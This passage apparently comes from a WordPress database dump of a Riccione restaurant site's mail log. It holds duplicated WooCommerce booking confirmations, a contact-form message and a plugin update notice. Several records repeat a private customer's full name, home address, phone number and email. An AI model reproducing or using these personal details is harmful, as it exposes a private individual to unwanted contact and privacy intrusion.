#e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Note:</th>\n					<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Prenotazione per 6/11 pranzo ore 13 circa</td>\n				</tr>\n						</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;vertical-align: top;margin-bottom: 40px;padding: 0\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;border: 0;padding: 0\">\n			<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px;color: #737373;border: 1px solid #e4e4e4\">\n				Raffaele Biondi<br>Via cecati 13<br>42122<br>Reggio emilia<br>REGGIO EMILIA									<br><a href=\"tel:3479247631\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">3479247631</a>													<br>raf.biondi@libero.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px\">Congratulations on the sale.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1222) - 5 November 2020','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1222-5-november-2020','','','2020-11-05 20:04:19','2020-11-05 19:04:19','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1222-5-november-2020/',0,'postman_sent_mail','',0),(1224,0,'2020-11-05 20:04:19','2020-11-05 19:04:19','\n\n	\n		\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">You’ve received the following order from Raffaele Biondi:</p>\n\n<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1222&amp;action=edit\" style=\"font-weight: normal;text-decoration: underline;color: #557da1\">[Order #1222]</a> (5 November 2020)</h2>\n\n<div style=\"margin-bottom: 40px\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;width: 100%;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		Caparra - 2 (#caparrax2)		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			<span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\"><span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Total:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\"><span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n									<tr>\n					<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Note:</th>\n					<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Prenotazione per 6/11 pranzo ore 13 circa</td>\n				</tr>\n						</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;vertical-align: top;margin-bottom: 40px;padding: 0\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;border: 0;padding: 0\">\n			<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px;color: #737373;border: 1px solid #e4e4e4\">\n				Raffaele Biondi<br>Via cecati 13<br>42122<br>Reggio emilia<br>REGGIO EMILIA									<br><a href=\"tel:3479247631\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">3479247631</a>													<br>raf.biondi@libero.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px\">Congratulations on the sale.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1222) - 5 November 2020','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1222-5-november-2020-2','','','2020-11-05 20:04:19','2020-11-05 19:04:19','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1222-5-november-2020-2/',0,'postman_sent_mail','',0),(1225,0,'2020-11-05 20:04:25','2020-11-05 19:04:25','\n\n	\n		\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Thank you for your order</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Hi Raffaele,</p>\n<p style=\"margin: 0 0 16px\">Just to let you know — we\'ve received your order #1222, and it is now being processed:</p>\n\n\n<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>\n	[Order #1222] (5 November 2020)</h2>\n\n<div style=\"margin-bottom: 40px\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;width: 100%;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		Caparra - 2		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			<span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\"><span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Total:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\"><span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n									<tr>\n					<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Note:</th>\n					<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Prenotazione per 6/11 pranzo ore 13 circa</td>\n				</tr>\n						</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;vertical-align: top;margin-bottom: 40px;padding: 0\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;border: 0;padding: 0\">\n			<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px;color: #737373;border: 1px solid #e4e4e4\">\n				Raffaele Biondi<br>Via cecati 13<br>42122<br>Reggio emilia<br>REGGIO EMILIA									<br><a href=\"tel:3479247631\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">3479247631</a>													<br>raf.biondi@libero.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px\">Thanks for using www.ristorantesolymar.it!</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','Your Sol Y Mar, ristorante a Riccione order has been received!','Incorrect authentication data\r\n','private','closed','closed','','your-sol-y-mar-ristorante-a-riccione-order-has-been-received','','','2020-11-05 20:04:25','2020-11-05 19:04:25','',0,'https://www.ristorantesolymar.it/postman_sent_mail/your-sol-y-mar-ristorante-a-riccione-order-has-been-received/',0,'postman_sent_mail','',0),(1226,0,'2020-11-05 20:04:25','2020-11-05 19:04:25','\n\n	\n		\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Thank you for your order</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Hi Raffaele,</p>\n<p style=\"margin: 0 0 16px\">Just to let you know — we\'ve received your order #1222, and it is now being processed:</p>\n\n\n<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>\n	[Order #1222] (5 November 2020)</h2>\n\n<div style=\"margin-bottom: 40px\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;width: 100%;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		Caparra - 2		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			<span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\"><span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Total:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\"><span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n									<tr>\n					<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Note:</th>\n					<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Prenotazione per 6/11 pranzo ore 13 circa</td>\n				</tr>\n						</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;vertical-align: top;margin-bottom: 40px;padding: 0\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;border: 0;padding: 0\">\n			<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px;color: #737373;border: 1px solid #e4e4e4\">\n				Raffaele Biondi<br>Via cecati 13<br>42122<br>Reggio emilia<br>REGGIO EMILIA									<br><a href=\"tel:3479247631\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">3479247631</a>													<br>raf.biondi@libero.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px\">Thanks for using www.ristorantesolymar.it!</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','Your Sol Y Mar, ristorante a Riccione order has been received!','Sent ( ** Fallback ** )','private','closed','closed','','your-sol-y-mar-ristorante-a-riccione-order-has-been-received-2','','','2020-11-05 20:04:25','2020-11-05 19:04:25','',0,'https://www.ristorantesolymar.it/postman_sent_mail/your-sol-y-mar-ristorante-a-riccione-order-has-been-received-2/',0,'postman_sent_mail','',0),(1227,0,'2020-11-05 20:23:34','2020-11-05 19:23:34','Da: Raffaele biondi \nTelefono: 3479247631\nOggetto: Conferma prenotazione\n\nCorpo del messaggio:\nBuonasera sono a chiedere conferma della corretta prenotazione effettuata tramite sito per domani 6/11  pranzo per 2 nome Raffaele biondi grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Conferma prenotazione\"','Incorrect authentication data\r\n','private','closed','closed','','da-sito-sol-y-mar-conferma-prenotazione','','','2020-11-05 20:23:34','2020-11-05 19:23:34','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-conferma-prenotazione/',0,'postman_sent_mail','',0),(1228,0,'2020-11-05 20:23:34','2020-11-05 19:23:34','Da: Raffaele biondi \nTelefono: 3479247631\nOggetto: Conferma prenotazione\n\nCorpo del messaggio:\nBuonasera sono a chiedere conferma della corretta prenotazione effettuata tramite sito per domani 6/11  pranzo per 2 nome Raffaele biondi grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Conferma prenotazione\"','Sent ( ** Fallback ** )','private','closed','closed','','da-sito-sol-y-mar-conferma-prenotazione-2','','','2020-11-05 20:23:34','2020-11-05 19:23:34','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-conferma-prenotazione-2/',0,'postman_sent_mail','',0),(1229,0,'2020-11-06 01:24:08','2020-11-06 00:24:08','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- WooCommerce version 4.6.2\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-11','','','2020-11-06 01:24:08','2020-11-06 00:24:08','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-11/',0,'postman_sent_mail','',0),(1230,0,'2020-11-06 01:24:08','2020-11-06 00:24:08','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your 